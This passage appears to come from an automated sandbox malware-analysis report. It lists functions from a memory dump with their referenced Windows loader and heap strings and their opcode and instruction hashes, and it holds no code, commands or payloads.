                                                      • Opcode Fuzzy Hash: 9c1bb89218627a14ecf4b2c3f58a78302a02e4d894af67ba637b9faddf3794e5
                                                      • Instruction Fuzzy Hash: 1B41E432A00A529FDB29CF9CD840B267BE4FF49E50B06016DED94E7B11E330D801CB81
                                                      Function 010D0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                      • API String ID: 0-2558761708
                                                      • Opcode ID: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                      • Instruction ID: f2a188000a975d7cecd3b10598becfc40d837888d209e644e7fb6054aa282c20
                                                      • Opcode Fuzzy Hash: 99dde28e25641c4c9a9f4b94c1484bd18d87f921658a3c4ccf5ecceff2d97aef
                                                      • Instruction Fuzzy Hash: 1411E4313182929FDB5DCA19C8D4BFAF7A6EF40625F148169F48ACB255EB30DC50C751
                                                      Function 011420DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • Process initialization failed with status 0x%08lx, xrefs: 011420F3
                                                      • minkernel\ntdll\ldrinit.c, xrefs: 01142104
                                                      • LdrpInitializationFailure, xrefs: 011420FA
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                      • API String ID: 0-2986994758
                                                      • Opcode ID: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                      • Instruction ID: aff298b926b8901b777fa06d10d4e9ffc77193c614667b978d94842d4f13b509
                                                      • Opcode Fuzzy Hash: b91b8e2ecece4a3b319056b8ef60f42c3a1035cca05f3def29ae3d2a063164c9
                                                      • Instruction Fuzzy Hash: 8FF0C235641308ABE728E64DDC92FA93768EB44F58F940069FB507B685D3F0A980CA91
                                                      Function 010D03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: ___swprintf_l
                                                      • String ID: #%u
                                                      • API String ID: 48624451-232158463
                                                      • Opcode ID: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                      • Instruction ID: 187f1672accb05ab60cc39eb06688544a88ffb3cd327f8a27294e0305de4bef4
                                                      • Opcode Fuzzy Hash: b74a320ad5c9f939c7b0dd153d24e62422a17b9fffe304d60c9fa6aede7ded89
                                                      • Instruction Fuzzy Hash: B07169B1A0020A9FDB05DFA8C980FAEB7F8FF18704F144065E905AB251EB74ED51CBA1
                                                      Function 010CA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • LdrResSearchResource Enter, xrefs: 010CAA13
                                                      • LdrResSearchResource Exit, xrefs: 010CAA25
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                      • API String ID: 0-4066393604
                                                      • Opcode ID: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                      • Instruction ID: 70d94841659b730bec1a30ed286aac50e4a58d25ed51cb2d01582d3113247a83
                                                      • Opcode Fuzzy Hash: bdceb5af3e2a45aeeabec17e2287d30ea90e3d82d63080144314080538215f49
                                                      • Instruction Fuzzy Hash: 7AE18F71F00219DBEB268F9CC980BEEBBB9BF08B14F10446AE951E7251E7389950CF51
                                                      Function 0118A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `$`
                                                      • API String ID: 0-197956300
                                                      • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction ID: 47fd6e9ece10615d61f618517d0302b816589588daa414ac2d7d8196c822d06d
                                                      • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                      • Instruction Fuzzy Hash: A4C1F4312043429BEB28EF28D841B6BBBE5AFC4318F188A2EF695C7290D775D545CF51
                                                      Function 0113E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Legacy$UEFI
                                                      • API String ID: 2994545307-634100481
                                                      • Opcode ID: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                                      • Instruction ID: 45f5a658a4b1e8fc0ac98f4bcbbb0dbfd6995dd3265eeacf7bfe3a1195a7ff9f
                                                      • Opcode Fuzzy Hash: 24527b543a3d199565b955d7cce3d0273b3ae3d3900ff86740f41b36d12ae267
                                                      • Instruction Fuzzy Hash: FE615E71E017199FDB19DFA8C850BAEBBB5FF88704F14406DE649EB295D731A900CB50
                                                      Function 011643D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: @$MUI
                                                      • API String ID: 0-17815947
                                                      • Opcode ID: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                      • Instruction ID: 6b79e5a6b4c977f6c8b859f2e3e4ddc8a1a16a244ba6d8f9742465b3e75f9e67
                                                      • Opcode Fuzzy Hash: 8049a94938566489a9043f20429efe17319f969f3405cc3bd9a89b255b143c1d
                                                      • Instruction Fuzzy Hash: C05137B1E0021DAEDF15DFA9CC84AEEBBBCEB48754F100529E611B7690D7719E05CBA0
                                                      Function 010C04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 010C063D
                                                      • kLsE, xrefs: 010C0540
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                      • API String ID: 0-2547482624
                                                      • Opcode ID: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                      • Instruction ID: 18b6a7f5d3ae61f8aa56bb79816020e459a7ab4307c6efcda3bb601658ac7759
                                                      • Opcode Fuzzy Hash: 0cfb27042c59f45eb6161e821435f3abae50b1d5905510187fa04fae2c5a631e
                                                      • Instruction Fuzzy Hash: 0D51CE79600742CFD724DF78C5806ABBBE4AF88B04F10893EE6EA87245E7709545CF92
                                                      Function 010CA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 010CA2FB
                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 010CA309
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                      • API String ID: 0-2876891731
                                                      • Opcode ID: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                      • Instruction ID: ac2f5d4592d7f96ba14d1f86da039c069ef42265f3cf17d90708a887ed2af744
                                                      • Opcode Fuzzy Hash: 03e473c644b81d89140c60df415e5dce4701892754d233877038c5610dc39e83
                                                      • Instruction Fuzzy Hash: 9141BE71B04659DBDB29CF69C850BAE7BB4FF84B00F1480A9E980DB291E3B5D900CF51
                                                      Function 010FA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID: Cleanup Group$Threadpool!
                                                      • API String ID: 2994545307-4008356553
                                                      • Opcode ID: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                      • Instruction ID: 773ea0b06412ec3e20d90356f18b5c44c621dd90354b3fb671b508c44c95cd9d
                                                      • Opcode Fuzzy Hash: b767c943526d3bbe4fda6c7939b50ca92abb95601b308a395e2b4eedba40886d
                                                      • Instruction Fuzzy Hash: 5D01ADB2650700EFE312DF24CD46B1677E8E798715F00893DA69CCB590E374D804CB46
                                                      Function 010CC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: MUI
                                                      • API String ID: 0-1339004836
                                                      • Opcode ID: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                      • Instruction ID: 21573ce60807c725f4a3380a88c5e53885531c6403465079367aa33d3c582e30
                                                      • Opcode Fuzzy Hash: b2e483a8f83efbfff21a73a479f8c041067c84c608d68dc643da69b3056f4b9a
                                                      • Instruction Fuzzy Hash: 8B825D75E002198FEB65CFA9C980BEDBBB1BF48B10F1481ADE999AB251D7309D41CF50
                                                      Function 01146420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                      • Instruction ID: d668f6eb27cb9769617bfcfde7eb06ca33bb8f1f4b267a98baac92d5adcbb3d5
                                                      • Opcode Fuzzy Hash: 9e2024d8aacb2516b609d9f30b767efb1500d2168b5cf7be34dfbc05858f0123
                                                      • Instruction Fuzzy Hash: 929184B1A40219AFEB25DF95CD85FEEBBB8EF59B54F104065F600AB190D774AD00CBA0
                                                      Function 0116E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3916222277
                                                      • Opcode ID: 9ef3b291d18ceeaabb86a9d1eb4e62f31a6ec81bc9e5f23fb3fe1452fa373ee7
                                                      • Instruction ID: 9f8efd8473782b6ea7cabff0f265f7f4bb813e642570d9ac22ee0ddc6910a648
                                                      • Opcode Fuzzy Hash: 9ef3b291d18ceeaabb86a9d1eb4e62f31a6ec81bc9e5f23fb3fe1452fa373ee7
                                                      • Instruction Fuzzy Hash: CC91C075A02209AEDB2AEBA5CC44FEFBB7EEF44740F010129F600A7250DB769911CB91
                                                      Function 010FA660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: GlobalTags
                                                      • API String ID: 0-1106856819
                                                      • Opcode ID: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                      • Instruction ID: 068b7e40d782b0a0ce528654d2d9a4e41f57be906b070bdb23065eb56af48c9b
                                                      • Opcode Fuzzy Hash: 40b99cfb61b601cb866057f9771cf7bc9f33b1bc8775445b77c68f639811f4d8
                                                      • Instruction Fuzzy Hash: 8B716BB5E0060AEFDF2DCF98C5906EDBBB1BF88714F14816EE945A7248E7718A41CB50
                                                      Function 01164978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: .mui
                                                      • API String ID: 0-1199573805
                                                      • Opcode ID: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                      • Instruction ID: 530743610de6527435fff42546c47304aeaafebd81fb3ce5deb9c7cfd51f2ef1
                                                      • Opcode Fuzzy Hash: 7b9129ae7b3e4b90de2c9902afd47fc10d8413fbb916766e1c7da8c43987cdd7
                                                      • Instruction Fuzzy Hash: DF51B872D0022A9BDF19DF99D840AEEBBB8EF04A54F054129E951BB640D3359C11CBE4
                                                      Function 010DE627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: EXT-
                                                      • API String ID: 0-1948896318
                                                      • Opcode ID: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                                      • Instruction ID: 0e034d2609850371c04ccc16610476c6982592adc1eee09f968fc0c59a4f6d7a
                                                      • Opcode Fuzzy Hash: 4df55c697b60c08a4b933de838a21d38e7f733f1f32750287aa4c5a3d131c76b
                                                      • Instruction Fuzzy Hash: AA419E72608312ABD751DA75C884BAFBBE8BF88B14F45096DFAC4DB180E774D904C792
                                                      Function 0113C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryHash
                                                      • API String ID: 0-2202222882
                                                      • Opcode ID: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                      • Instruction ID: 976d51aa8205205cb597d28f88f1212561457f00fbfb9268ad755d3807166233
                                                      • Opcode Fuzzy Hash: 298df512071ee6d11aac9919ed80468770d820e468e8cbbdf0e0706fa9d29ef9
                                                      • Instruction Fuzzy Hash: 574121B1D0062DAADB25DA50CC84FDEB77CAB54718F0045E6EB08BB144DB709E898FE4
                                                      Function 01156B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: #
                                                      • API String ID: 0-1885708031
                                                      • Opcode ID: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                      • Instruction ID: 9700e758265586b6475a00e9d0ad1352cf2e1033a5e808ccb8f0d72b21f10a0e
                                                      • Opcode Fuzzy Hash: 8c9f18217b2d205887f64894f650f1a96cc96b5dcb1dab34166178f1be968108
                                                      • Instruction Fuzzy Hash: 6E312A31F00709DBEB2ADB69C850BEE7BB8DF55704F944028ED60AB282C775D905CB90
                                                      Function 0113CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: BinaryName
                                                      • API String ID: 0-215506332
                                                      • Opcode ID: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                      • Instruction ID: 74afc80bf5c2dc6c1ac73ded271ccf62d3f58110f6f5d43137b42a7db675c27f
                                                      • Opcode Fuzzy Hash: a0db59dabb3c128ffcfa833ffcf65edbb6116ee84aff16d32ffc865b133bc6b7
                                                      • Instruction Fuzzy Hash: 0B31E576900519AFEB1EDB59C855FAFBB74EBC0790F01412AE905B7254D7309E04DBE0
                                                      Function 0114892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0114895E
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                      • API String ID: 0-702105204
                                                      • Opcode ID: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                      • Instruction ID: 43ff17aa30f112ab497cf6f89aa2b4e9d0a9bf64f22701490adc86b68a8ef438
                                                      • Opcode Fuzzy Hash: 3ea2d8b7ac6cc39c53a73ff329272cc75ea8279ee6ab7a8e5b029f2696212d20
                                                      • Instruction Fuzzy Hash: 7F012B39211A06DFEA2D6F95DCC4B9A7F66EFC5E94B08002CF78116151DB206C81C793
                                                      Function 01162000 Relevance: .8, Instructions: 757COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                      • Instruction ID: 8577386e80d39f9c20ac103bde51bb56b125614b9f567ae5bfdb2c227e7857ed
                                                      • Opcode Fuzzy Hash: 725b93ecd11761517a961774b891bd3d72401adbb363a394bf98ec52ed76a1e0
                                                      • Instruction Fuzzy Hash: E042D3726083418FD72DCF68C890A6BBBEDBF98344F08492DFA8297250D776D855CB52
                                                      Function 01158158 Relevance: .6, Instructions: 617COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                      • Instruction ID: d2d816ac356c10d0cbd6d0e3628a7f49c0efa97e93ad366dfe22f6b2cb58af1f
                                                      • Opcode Fuzzy Hash: 4f1a4a56f165cfc9b1d707a51a719ac17881936ad01d36c9dbbb474495abbbf8
                                                      • Instruction Fuzzy Hash: 28425F75E10219CFEB69CF6AC841BADBBF5BF48300F148099E999EB242D7349981CF50
                                                      Function 010D2840 Relevance: .6, Instructions: 605COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                      • Instruction ID: 455f228e57c7c9f7d7138e442dfc08df34fa312ed0441b2609d4a40131e8e25c
                                                      • Opcode Fuzzy Hash: 6068299cb5205f77585d15fbf126d941bba26cf40bc932668fdd4f0ee1a319ed
                                                      • Instruction Fuzzy Hash: DA32DE70A007658FEB2DCF69C8447BEBBF2BF84304F24411DD9969B285DB75A862CB50
                                                      Function 0116A118 Relevance: .6, Instructions: 591COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                      • Instruction ID: e43e73ef3c5ac9072131184fbfed59b86dd4aee8e763913c270d8bf738f93453
                                                      • Opcode Fuzzy Hash: d55a033c934b1b4fa4c37cf3c2cbd6a09c5ea55ca53795d0f3c3a2d632406f6f
                                                      • Instruction Fuzzy Hash: B222D4702046618FE72DCF2DE490372BBF9AF45304F098459D9969F286D737E862CB61
                                                      Function 010C6A50 Relevance: .5, Instructions: 548COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                      • Instruction ID: bbb48cb9698bb9d3b53bd70429b14b830745d5b5c8312fa43f0adda341880b1f
                                                      • Opcode Fuzzy Hash: f26801c4327ff9fb2e2a54a825e2f40c5c1385d6598495e2235204c08fdaa580
                                                      • Instruction Fuzzy Hash: 6A329C70A04215DFDB29CF68C480AAEBBF2FF48710F24456EE995AB391D731A851CF90
                                                      Function 010E4A35 Relevance: .4, Instructions: 423COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction ID: 4ad29277baf7fad50c0ef3383d6727afdd93d276d1d78c6d643163e84744938e
                                                      • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                      • Instruction Fuzzy Hash: 64F19F71E0421A9FDF19DF9AC884BAEBBF5AF48710F048169E985EB340E775D841CB60
                                                      Function 0115892B Relevance: .4, Instructions: 386COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                                      • Instruction ID: e1339d89489e69a7fc8dc2c48ec6d6108c01e7209805705029c3f6b6bee818bc
                                                      • Opcode Fuzzy Hash: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                                      • Instruction Fuzzy Hash: 6CD1EF71E0060ACFDF4DCF6AC841AFEB7F5AF88304F198169D965A7281E735E9058B60
                                                      Function 010C65D0 Relevance: .4, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                                      • Instruction ID: 4e4fcbe505c9d4a8a7a07bc341419cf22527eb4198a0fae6efeadee6a9e6272d
                                                      • Opcode Fuzzy Hash: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                                      • Instruction Fuzzy Hash: 03E16C715083429FC725CF28C490A6EBBE0FF89714F158A6DE99987351EB32E905CF92
                                                      Function 010B8397 Relevance: .4, Instructions: 380COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1453432661.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1090000_AB2hQJZ77ipdWem.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                      • Instruction ID: 38ad58b5256610fa62c6d2c72bd69f9a02bb96dc422bd23e3cd384352e797c18
                                                      • Opcode Fuzzy Hash: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                                      • Instruction Fuzzy Hash: DCD1E471A002069BDB18DF69C8C0AFEB7F9BF54308F04852EE955DB2A4EB34D955CB50
